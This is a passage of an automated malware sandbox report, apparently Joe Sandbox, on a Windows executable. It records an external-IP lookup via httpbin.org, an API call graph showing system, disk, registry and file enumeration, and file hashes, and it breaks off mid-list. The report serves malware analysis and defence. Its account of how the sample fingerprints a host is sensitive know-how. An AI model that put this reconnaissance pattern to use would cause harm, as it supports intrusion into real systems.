                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.124971134.226.108.1554437104C:\Users\user\Desktop\dZsdMl5Pwl.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-27 13:54:11 UTC52OUTGET /ip HTTP/1.1
                                                        Host: httpbin.org
                                                        Accept: */*
                                                        2024-12-27 13:54:12 UTC224INHTTP/1.1 200 OK
                                                        Date: Fri, 27 Dec 2024 13:54:12 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 31
                                                        Connection: close
                                                        Server: gunicorn/19.9.0
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Credentials: true
                                                        2024-12-27 13:54:12 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                        Data Ascii: { "origin": "8.46.123.189"}


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:08:54:05
                                                        Start date:27/12/2024
                                                        Path:C:\Users\user\Desktop\dZsdMl5Pwl.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\dZsdMl5Pwl.exe"
                                                        Imagebase:0x980000
                                                        File size:4'523'520 bytes
                                                        MD5 hash:EFD7BBABA8AA8E6865430D1FFCFBF2D5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:2.4%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:15%
                                                          Total number of Nodes:492
                                                          Total number of Limit Nodes:77
                                                          execution_graph 61500 991139 61514 9bbaa0 61500->61514 61502 991148 61503 991512 61502->61503 61504 991161 61502->61504 61510 990f00 61503->61510 61522 9922d0 _open 61503->61522 61504->61510 61518 990150 61504->61518 61508 990150 _open 61508->61510 61510->61508 61511 990f7b 61510->61511 61512 9875a0 _open 61510->61512 61523 9bd4d0 _open 61510->61523 61524 994940 _open 61510->61524 61525 993900 _open 61510->61525 61512->61510 61515 9bbb60 61514->61515 61517 9bbac7 61514->61517 61515->61502 61517->61515 61526 9a05b0 _open 61517->61526 61519 990167 61518->61519 61521 9901c3 61519->61521 61527 9930d0 _open 61519->61527 61521->61510 61522->61510 61523->61510 61524->61510 61525->61510 61526->61515 61527->61521 61001 a370a0 61006 a370ae 61001->61006 61003 a371a7 61004 a3717f 61004->61003 61013 a49320 closesocket 61004->61013 61006->61003 61006->61004 61008 a4a8c0 61006->61008 61012 a371c0 socket ioctlsocket connect getsockname 61006->61012 61009 a4a8e6 61008->61009 61010 a4a903 recvfrom 61008->61010 61009->61010 61011 a4a8ed 61009->61011 61010->61011 61011->61006 61012->61006 61013->61003 61014 a34720 61018 a34728 61014->61018 61015 a34733 61017 a34774 61018->61015 61023 a3476c 61018->61023 61024 a39270 61018->61024 61020 a34860 61027 a34950 61020->61027 61022 a34878 61023->61022 61033 a330a0 closesocket 61023->61033 61034 a3a440 61024->61034 61026 a39297 61026->61020 61028 a34966 61027->61028 61031 a349c5 61028->61031 61032 a349b9 61028->61032 61068 a3b590 if_indextoname 61028->61068 61030 a34aa0 gethostname 61030->61031 61030->61032 61031->61023 61032->61030 61032->61031 61033->61017 61046 a3a46b 61034->61046 61035 a3a4db 61036 a3aa03 RegOpenKeyExA 61035->61036 61053 a3ad14 61035->61053 61037 a3ab70 RegOpenKeyExA 61036->61037 61038 a3aa27 RegQueryValueExA 61036->61038 61041 a3ab90 61037->61041 61042 a3ac34 RegOpenKeyExA 61037->61042 61039 a3aa71 61038->61039 61040 a3aacc RegQueryValueExA 61038->61040 61039->61040 61049 a3aa85 RegQueryValueExA 61039->61049 61044 a3ab66 RegCloseKey 61040->61044 61045 a3ab0e 61040->61045 61041->61042 61043 a3acf8 RegOpenKeyExA 61042->61043 61058 a3ac54 61042->61058 61047 a3ad56 RegEnumKeyExA 61043->61047 61043->61053 61044->61037 61045->61044 61052 a3ab1e RegQueryValueExA 61045->61052 61046->61035 61062 a3a794 GetBestRoute2 61046->61062 61064 a3a6c7 GetBestRoute2 61046->61064 61065 a3a520 61046->61065 61048 a3ad9b 61047->61048 61047->61053 61050 a3ae16 RegOpenKeyExA 61048->61050 61051 a3aab3 61049->61051 61054 a3ae34 RegQueryValueExA 61050->61054 61055 a3addf RegEnumKeyExA 61050->61055 61051->61040 61056 a3ab4c 61052->61056 61053->61026 61057 a3af43 RegQueryValueExA 61054->61057 61066 a3adaa 61054->61066 61055->61050 61055->61053 61056->61044 61059 a3b052 RegQueryValueExA 61057->61059 61057->61066 61058->61043 61060 a3adc7 RegCloseKey 61059->61060 61059->61066 61060->61055 61062->61046 61063 a3afa0 RegQueryValueExA 61063->61066 61064->61046 61065->61035 61067 a3b830 if_indextoname 61065->61067 61066->61057 61066->61059 61066->61060 61066->61063 61067->61035 61068->61032 61069 a4a920 61070 a4a944 61069->61070 61071 a4a94b 61070->61071 61072 a4a977 send 61070->61072 61528 a4b180 61529 a4b2e3 61528->61529 61530 a4b19b 61528->61530 61530->61529 61533 a4b2a9 getsockname 61530->61533 61535 a4b020 closesocket 61530->61535 61536 a4af30 61530->61536 61540 a4b060 61530->61540 61545 a4b020 61533->61545 61535->61530 61537 a4af63 socket 61536->61537 61538 a4af4c 61536->61538 61537->61530 61538->61537 61539 a4af52 61538->61539 61539->61530 61544 a4b080 61540->61544 61541 a4b0b0 connect 61542 a4b0bf WSAGetLastError 61541->61542 61543 a4b0ea 61542->61543 61542->61544 61543->61530 61544->61541 61544->61542 61544->61543 61546 a4b052 61545->61546 61547 a4b029 61545->61547 61546->61530 61548 a4b04b closesocket 61547->61548 61549 a4b03e 61547->61549 61548->61546 61549->61530 61550 a4a080 61553 a49740 61550->61553 61552 a4a09b 61554 a49780 61553->61554 61558 a4975d 61553->61558 61555 a49925 RegOpenKeyExA 61554->61555 61554->61558 61556 a4995a RegQueryValueExA 61555->61556 61555->61558 61557 a49986 RegCloseKey 61556->61557 61557->61558 61558->61552 61073 98255d 61074 d09f70 61073->61074 61075 98256c GetSystemInfo 61074->61075 61076 982589 61075->61076 61077 9825a0 GlobalMemoryStatusEx 61076->61077 61078 9825ec 61077->61078 61079 982762 61078->61079 61080 98263c GetDriveTypeA 61078->61080 61082 9827d6 KiUserCallbackDispatcher 61079->61082 61080->61078 61081 982655 GetDiskFreeSpaceExA 61080->61081 61081->61078 61083 9827f8 61082->61083 61084 982842 SHGetKnownFolderPath 61083->61084 61085 9828c3 61084->61085 61086 9828d9 FindFirstFileW 61085->61086 61087 982906 FindNextFileW 61086->61087 61088 982928 61086->61088 61087->61087 61087->61088 61089 983d5e 61092 983d30 61089->61092 61091 983d90 61092->61089 61092->61091 61093 990ab0 61092->61093 61096 9905b0 61093->61096 61097 9907c7 61096->61097 61105 9905bd 61096->61105 61097->61092 61102 99066a 61107 9906f0 61102->61107 61109 9907ce 61102->61109 61115 9973b0 _open 61102->61115 61103 990707 WSAEventSelect 61103->61107 61103->61109 61104 9907ef 61104->61109 61112 990847 61104->61112 61128 996fa0 61104->61128 61105->61097 61105->61102 61105->61109 61113 9903c0 _open 61105->61113 61114 997450 _open 61105->61114 61107->61103 61107->61104 61116 9876a0 61107->61116 61127 997380 _open 61109->61127 61110 9909e8 WSAEnumNetworkEvents 61111 9909d0 WSAEventSelect 61110->61111 61110->61112 61111->61110 61111->61112 61112->61109 61112->61110 61112->61111 61113->61105 61114->61105 61115->61102 61117 9876c0 61116->61117 61118 9876e6 send 61116->61118 61117->61118 61119 9876c9 61117->61119 61120 9876d3 61118->61120 61126 987704 61118->61126 61119->61120 61121 98770b 61119->61121 61132 9872a0 _open 61120->61132 61133 9872a0 _open 61121->61133 61124 98771c 61134 98cb20 _open 61124->61134 61126->61107 61127->61097 61129 996fd4 61128->61129 61131 996feb 61128->61131 61130 997207 select 61129->61130 61129->61131 61130->61131 61131->61112 61132->61126 61133->61124 61134->61126 61559 9829ff FindFirstFileA 61560 982a31 61559->61560 61561 982a5c RegOpenKeyExA 61560->61561 61562 982a93 61561->61562 61563 982ade CharUpperA 61562->61563 61565 982b0a 61563->61565 61564 982bf9 QueryFullProcessImageNameA 61566 982c3b CloseHandle 61564->61566 61565->61564 61568 982c64 61566->61568 61567 982df1 CloseHandle 61569 982e23 61567->61569 61568->61567 61570 98f7b0 61573 98f7c3 61570->61573 61590 98f97a 61570->61590 61571 990150 _open 61574 98f854 61571->61574 61573->61571 61573->61590 61574->61590 61591 9bcd80 61574->61591 61575 98f942 61576 98f987 61575->61576 61577 9d1390 _open 61575->61577 61603 9d1390 61576->61603 61577->61575 61580 9d1390 _open 61581 98f9a0 61580->61581 61582 9d1390 _open 61581->61582 61583 98f9ac 61582->61583 61584 98f9bb WSACloseEvent 61583->61584 61585 9875a0 _open 61584->61585 61586 98f9df 61585->61586 61587 9875a0 _open 61586->61587 61588 98fa12 61587->61588 61589 9875a0 _open 61588->61589 61589->61590 61594 9bd0f1 61591->61594 61599 9bcd9a 61591->61599 61592 9bd0e5 61593 9d1390 _open 61592->61593 61593->61594 61594->61575 61596 9bd016 61610 99f6c0 WSACloseEvent select closesocket _open 61596->61610 61598 9bd018 61609 997380 _open 61598->61609 61599->61592 61599->61596 61599->61598 61600 996fa0 select 61599->61600 61607 9be130 closesocket _open 61599->61607 61608 997380 _open 61599->61608 61600->61599 61605 98f98d 61603->61605 61606 9d139d 61603->61606 61604 9875a0 _open 61604->61605 61605->61580 61606->61604 61607->61599 61608->61599 61609->61596 61610->61592 61135 9b8b50 61136 9b8b6b 61135->61136 61165 9b8be6 61135->61165 61137 9b8b8f 61136->61137 61138 9b8bf3 61136->61138 61136->61165 61237 996e40 select 61137->61237 61168 9ba550 61138->61168 61142 9b8cd9 SleepEx 61151 9b8d14 61142->61151 61143 9b8e85 61147 9b8eae 61143->61147 61143->61165 61243 992a00 _open 61143->61243 61144 9b8c1f connect 61145 9b8c35 61144->61145 61225 9ba150 61145->61225 61146 9ba150 2 API calls 61156 9b8dff 61146->61156 61147->61165 61244 9878b0 closesocket 61147->61244 61148 9b8cb2 61148->61143 61148->61146 61148->61165 61151->61148 61152 9b8d43 61151->61152 61160 9ba150 2 API calls 61152->61160 61154 9b8bb5 61154->61165 61239 9c50a0 _open 61154->61239 61155 9b8c8b 61158 9b8ba1 61155->61158 61159 9b8dc8 61155->61159 61156->61143 61241 99d090 _open 61156->61241 61158->61142 61158->61148 61158->61154 61240 9bb100 _open 61159->61240 61160->61154 61163 9b8e67 61242 9c4fd0 _open 61163->61242 61169 9ba575 61168->61169 61171 9ba597 61169->61171 61248 9875e0 61169->61248 61173 9ba6d9 61171->61173 61260 9bef30 61171->61260 61174 9ba709 61173->61174 61184 9ba713 61173->61184 61267 992a00 _open 61173->61267 61176 9878b0 2 API calls 61174->61176 61174->61184 61175 9ba63a 61180 9ba641 61175->61180 61185 9ba69b 61175->61185 61176->61184 61177 9b8bfc 61177->61144 61177->61145 61177->61148 61177->61165 61179 9ba7e5 61183 9ba811 setsockopt 61179->61183 61189 9ba87c 61179->61189 61199 9ba8ee 61179->61199 61180->61179 61269 9c4fd0 _open 61180->61269 61183->61189 61191 9ba83b 61183->61191 61184->61177 61268 9c50a0 _open 61184->61268 61265 99d090 _open 61185->61265 61187 9ba6c9 61266 9c4f40 _open 61187->61266 61189->61199 61272 9bb1e0 _open 61189->61272 61191->61189 61270 99d090 _open 61191->61270 61194 9baf56 61194->61173 61195 9baf5d 61194->61195 61195->61184 61198 9ba150 2 API calls 61195->61198 61196 9ba86d 61271 9c4fd0 _open 61196->61271 61198->61184 61199->61173 61201 9baf33 61199->61201 61203 9bacb8 61199->61203 61204 9bae32 61199->61204 61207 9babb9 61199->61207 61224 9babe1 61199->61224 61200 9bb056 61282 99d090 _open 61200->61282 61264 9e67e0 ioctlsocket 61201->61264 61202 9baf03 61202->61201 61280 9c4fd0 _open 61202->61280 61203->61173 61203->61207 61212 9bacdc 61203->61212 61204->61207 61279 9c4fd0 _open 61204->61279 61205 9bad45 61208 9bade6 61205->61208 61216 9bad5f 61205->61216 61207->61205 61207->61208 61207->61224 61274 9b6be0 select closesocket _open 61207->61274 61277 99d090 _open 61208->61277 61273 99d090 _open 61212->61273 61214 9bb07b 61283 9c4f40 _open 61214->61283 61217 9badb7 61216->61217 61275 9c4fd0 _open 61216->61275 61276 9d3030 _open 61217->61276 61221 9bad01 61278 9c4f40 _open 61221->61278 61224->61173 61224->61200 61224->61202 61281 9c4fd0 _open 61224->61281 61226 9ba15f 61225->61226 61227 9b8c4d 61225->61227 61226->61227 61228 9ba181 getsockname 61226->61228 61227->61155 61238 9c50a0 _open 61227->61238 61229 9ba1d0 61228->61229 61230 9ba1f7 61228->61230 61288 99d090 _open 61229->61288 61231 9bef30 _open 61230->61231 61235 9ba20f 61231->61235 61233 9ba1eb 61290 9c4f40 _open 61233->61290 61235->61227 61289 99d090 _open 61235->61289 61237->61158 61238->61155 61239->61165 61240->61148 61241->61163 61242->61143 61243->61147 61245 9878d7 61244->61245 61246 9878c5 61244->61246 61245->61165 61291 9872a0 _open 61246->61291 61249 987607 socket 61248->61249 61252 9875ef 61248->61252 61250 98762b 61249->61250 61251 98763a 61249->61251 61284 9872a0 _open 61250->61284 61251->61171 61252->61249 61253 987601 61252->61253 61254 987643 61252->61254 61253->61249 61285 9872a0 _open 61254->61285 61257 987654 61286 98cb20 _open 61257->61286 61259 987674 61259->61171 61261 9befa8 61260->61261 61263 9bef47 61260->61263 61261->61263 61287 98c960 _open 61261->61287 61263->61175 61264->61194 61265->61187 61266->61173 61267->61174 61268->61177 61269->61179 61270->61196 61271->61189 61272->61199 61273->61221 61274->61205 61275->61217 61276->61224 61277->61221 61278->61173 61279->61207 61280->61201 61281->61224 61282->61214 61283->61173 61284->61251 61285->61257 61286->61259 61287->61263 61288->61233 61289->61233 61290->61227 61291->61245 61611 9b95b0 61612 9b95c8 61611->61612 61614 9b95fd 61611->61614 61613 9ba150 2 API calls 61612->61613 61612->61614 61613->61614 61292 9831d7 61293 9831f4 61292->61293 61294 983200 61293->61294 61295 9832dc CloseHandle 61293->61295 61295->61294 61296 982f17 61303 982f2c 61296->61303 61297 9831d3 61298 982fb3 RegOpenKeyExA 61298->61303 61299 98315c RegEnumKeyExA 61299->61303 61300 983046 RegOpenKeyExA 61301 983089 RegQueryValueExA 61300->61301 61300->61303 61302 98313b RegCloseKey 61301->61302 61301->61303 61302->61303 61303->61297 61303->61298 61303->61299 61303->61300 61303->61302 61304 e07830 61305 e0785a 61304->61305 61306 e07866 61305->61306 61314 d08f70 61305->61314 61311 e078a6 61312 d08f70 _open 61313 e078af 61312->61313 61325 d08e90 _open 61314->61325 61316 d08f82 61317 d08e90 _open 61316->61317 61318 d08fa2 61317->61318 61319 d08f70 _open 61318->61319 61320 d08fb8 61319->61320 61321 d112c0 61320->61321 61322 d112cc 61321->61322 61327 d0e050 61322->61327 61324 d112fa 61324->61311 61324->61312 61326 d08eba 61325->61326 61326->61316 61328 d0e09d 61327->61328 61329 d0e18e 61328->61329 61331 d0b1a0 islower islower 61328->61331 61329->61324 61331->61328 61615 e0f250 61616 e0f282 61615->61616 61617 e0f28e 61616->61617 61618 d08f70 _open 61616->61618 61619 e0f297 61618->61619 61332 9813c9 61335 981160 61332->61335 61336 9813a1 61335->61336 61337 d093e0 61335->61337 61347 d08a20 _open islower islower 61335->61347 61338 d09400 61337->61338 61346 d093f3 61337->61346 61339 d09688 61338->61339 61340 d096c7 61338->61340 61344 d09280 vfprintf 61338->61344 61345 d09220 vfprintf 61338->61345 61338->61346 61339->61340 61339->61346 61348 d09280 vfprintf 61339->61348 61349 d09220 vfprintf 61340->61349 61343 d096df 61343->61335 61344->61338 61345->61338 61346->61335 61347->61335 61348->61339 61349->61343 61620 99d5e0 61621 99d5f0 61620->61621 61622 99d652 WSAStartup 61620->61622 61626 99d67c 61621->61626 61627 99d690 _open 61621->61627 61622->61621 61623 99d664 61622->61623 61625 99d5fa 61627->61625 61350 9bb3c0 61351 9bb3cb 61350->61351 61352 9bb3ee 61350->61352 61354 9876a0 2 API calls 61351->61354 61356 9b9290 61351->61356 61353 9bb3ea 61354->61353 61357 9876a0 2 API calls 61356->61357 61358 9b92e5 61357->61358 61359 9b93c3 61358->61359 61361 9b92f3 61358->61361 61364 9b9392 61359->61364 61370 99d090 _open 61359->61370 61360 9b93be 61360->61353 61361->61364 61365 9b9335 WSAIoctl 61361->61365 61363 9b93f7 61371 9c4f40 _open 61363->61371 61364->61360 61372 9c50a0 _open 61364->61372 61365->61364 61368 9b9366 61365->61368 61368->61364 61369 9b9371 setsockopt 61368->61369 61369->61364 61370->61363 61371->61364 61372->61360 61373 9be400 61374 9be412 61373->61374 61380 9be459 61373->61380 61375 9be422 61374->61375 61397 9d3030 _open 61374->61397 61398 9e09d0 _open 61375->61398 61378 9be42b 61399 9b68b0 closesocket _open 61378->61399 61379 9be4a8 61380->61379 61383 9be495 61380->61383 61385 9bb5a0 61380->61385 61383->61379 61384 9bb5a0 _open 61383->61384 61384->61379 61386 9bb5d2 61385->61386 61387 9bb5c0 61385->61387 61386->61383 61387->61386 61388 9bb713 61387->61388 61391 9bb626 61387->61391 61401 9c4f40 _open 61388->61401 61390 9bb65a 61390->61386 61392 9bb72b 61390->61392 61393 9bb737 61390->61393 61391->61386 61391->61390 61391->61392 61391->61393 61400 9c50a0 _open 61391->61400 61392->61386 61402 9c50a0 _open 61392->61402 61393->61386 61403 9c50a0 _open 61393->61403 61397->61375 61398->61378 61399->61380 61400->61391 61401->61386 61402->61386 61403->61386 61404 9bb400 61405 9bb40b 61404->61405 61406 9bb425 61404->61406 61409 987770 61405->61409 61407 9bb421 61410 987790 61409->61410 61411 9877b6 recv 61409->61411 61410->61411 61412 987799 61410->61412 61413 9877a3 61411->61413 61419 9877d4 61411->61419 61412->61413 61414 9877db 61412->61414 61420 9872a0 _open 61413->61420 61421 9872a0 _open 61414->61421 61417 9877ec 61422 98cb20 _open 61417->61422 61419->61407 61420->61419 61421->61417 61422->61419 61423 9bf100 61425 9bf11f 61423->61425 61451 9bf1b8 61423->61451 61424 9bff1a 61461 9c0c80 _open 61424->61461 61427 9bf2a3 61425->61427 61442 9bf240 61425->61442 61445 9bf5b9 61425->61445 61425->61451 61455 9c4f40 _open 61427->61455 61429 9c0045 61432 9c010d 61429->61432 61436 9c004d 61429->61436 61429->61451 61464 9c50a0 _open 61429->61464 61430 9bf80d 61435 9c015e 61432->61435 61465 9c50a0 _open 61432->61465 61433 9c50a0 _open 61433->61445 61434 9c008a 61463 9c4f40 _open 61434->61463 61435->61436 61466 9c50a0 _open 61435->61466 61467 9c4f40 _open 61436->61467 61442->61451 61456 987310 _open 61442->61456 61444 9bf491 61444->61445 61458 987310 _open 61444->61458 61445->61424 61445->61429 61445->61430 61445->61433 61445->61434 61447 9c0d30 _open 61445->61447 61460 9c4fd0 _open 61445->61460 61446 9bff5b 61446->61451 61462 9c50a0 _open 61446->61462 61447->61445 61450 9bf3ce 61450->61444 61450->61451 61457 9c50a0 _open 61450->61457 61453 9bf50d 61453->61445 61453->61451 61459 9c50a0 _open 61453->61459 61455->61451 61456->61450 61457->61444 61458->61453 61459->61445 61460->61445 61461->61446 61462->61451 61463->61451 61464->61432 61465->61435 61466->61436 61467->61451 61468 9c0700 61469 9c0719 61468->61469 61482 9c099d 61468->61482 61472 9c09b5 61469->61472 61474 9c09f6 61469->61474 61476 9c0a35 61469->61476 61469->61482 61486 987310 _open 61469->61486 61487 9bb8e0 _open 61469->61487 61488 9ef570 _open 61469->61488 61489 9aeb30 _open 61469->61489 61490 9e13a0 _open 61469->61490 61491 a039a0 _open 61469->61491 61492 9aeae0 _open 61469->61492 61472->61482 61493 9c50a0 _open 61472->61493 61494 9875a0 61474->61494 61498 9c4f40 _open 61476->61498 61484 9875a0 _open 61484->61482 61486->61469 61487->61469 61488->61469 61489->61469 61490->61469 61491->61469 61492->61469 61493->61482 61495 9875aa 61494->61495 61497 9875d1 61494->61497 61495->61497 61499 9872a0 _open 61495->61499 61497->61484 61498->61482 61499->61497

                                                          Executed Functions

                                                          Function 009BF100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001302000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001308000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480479577.0000000001400000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480597176.00000000015C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480616581.00000000015C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                          • API String ID: 0-1590685507
                                                          • Opcode ID: a3f4476e7547c074a06b7cd03b3db7dc3431d64933f0c765f8b37b42895500b4
                                                          • Instruction ID: dc5af10b04215763d3f76ad65aeb6a2bfc4da2e44bc111864bd5ede5078ac92d
                                                          • Opcode Fuzzy Hash: a3f4476e7547c074a06b7cd03b3db7dc3431d64933f0c765f8b37b42895500b4
                                                          • Instruction Fuzzy Hash: D7C2A031A04344DFD714CF28C994BAAB7E5BF84324F05866DEC989B2A2D771ED85CB81
                                                          Function 0098255D Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 282fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSystemInfo.KERNELBASE ref: 00982579
                                                          • GlobalMemoryStatusEx.KERNELBASE ref: 009825CC
                                                          • GetDriveTypeA.KERNELBASE ref: 00982647
                                                          • GetDiskFreeSpaceExA.KERNELBASE ref: 0098267E
                                                          • KiUserCallbackDispatcher.NTDLL ref: 009827E2
                                                          • SHGetKnownFolderPath.SHELL32 ref: 0098286D
                                                          • FindFirstFileW.KERNELBASE ref: 009828F8
                                                          • FindNextFileW.KERNELBASE ref: 0098291F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001302000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001308000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480479577.0000000001400000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480597176.00000000015C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480616581.00000000015C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: FileFind$CallbackDiskDispatcherDriveFirstFolderFreeGlobalInfoKnownMemoryNextPathSpaceStatusSystemTypeUser
                                                          • String ID: @$`
                                                          • API String ID: 2066228396-3318628307
                                                          • Opcode ID: 12addb2511919f48fcfd20eac09b16d1ad88dc5f21a8fcf2965671b371aa4bfc
                                                          • Instruction ID: be18763726eefba08c163bf3fa0280599399f84325bc61d64df0a0eb6b99f73f
                                                          • Opcode Fuzzy Hash: 12addb2511919f48fcfd20eac09b16d1ad88dc5f21a8fcf2965671b371aa4bfc
                                                          • Instruction Fuzzy Hash: 77D1B5B49043099FDB10EF78C58569EBBF0FF84344F008969E898A7356E7759A84CF92
                                                          Function 009829FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1265 9829ff-982a2f FindFirstFileA 1266 982a38 1265->1266 1267 982a31-982a36 1265->1267 1268 982a3d-982a91 call e09c50 call e09ce0 RegOpenKeyExA 1266->1268 1267->1268 1273 982a9a 1268->1273 1274 982a93-982a98 1268->1274 1275 982a9f-982b0c call e09c50 call e09ce0 CharUpperA call d08da0 1273->1275 1274->1275 1283 982b0e-982b13 1275->1283 1284 982b15 1275->1284 1285 982b1a-982b92 call e09c50 call e09ce0 call d08e80 call d08e70 1283->1285 1284->1285 1294 982bcc-982c66 QueryFullProcessImageNameA CloseHandle call d08da0 1285->1294 1295 982b94-982ba3 1285->1295 1305 982c68-982c6d 1294->1305 1306 982c6f 1294->1306 1298 982bb0-982bc0 call d08e68 1295->1298 1299 982ba5-982bae 1295->1299 1303 982bc5-982bca 1298->1303 1299->1294 1303->1294 1303->1295 1307 982c74-982ce9 call e09c50 call e09ce0 call d08e80 call d08e70 1305->1307 1306->1307 1316 982dcf-982e1c call e09c50 call e09ce0 CloseHandle 1307->1316 1317 982cef-982d49 call d08bb0 call d08da0 1307->1317 1327 982e23-982e2e 1316->1327 1328 982d99-982dad 1317->1328 1329 982d4b-982d63 call d08da0 1317->1329 1330 982e30-982e35 1327->1330 1331 982e37 1327->1331 1328->1316 1329->1328 1338 982d65-982d7d call d08da0 1329->1338 1332 982e3c-982ed6 call e09c50 call e09ce0 1330->1332 1331->1332 1347 982ed8-982ee1 1332->1347 1348 982eea 1332->1348 1338->1328 1343 982d7f-982d97 call d08da0 1338->1343 1343->1328 1349 982daf-982dc9 call d08e68 1343->1349 1347->1348 1350 982ee3-982ee8 1347->1350 1351 982eef-982f16 call e09c50 call e09ce0 1348->1351 1349->1316 1349->1317 1350->1351
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001302000.00000040.00000001.01000000.00000003.sdmpDownload File
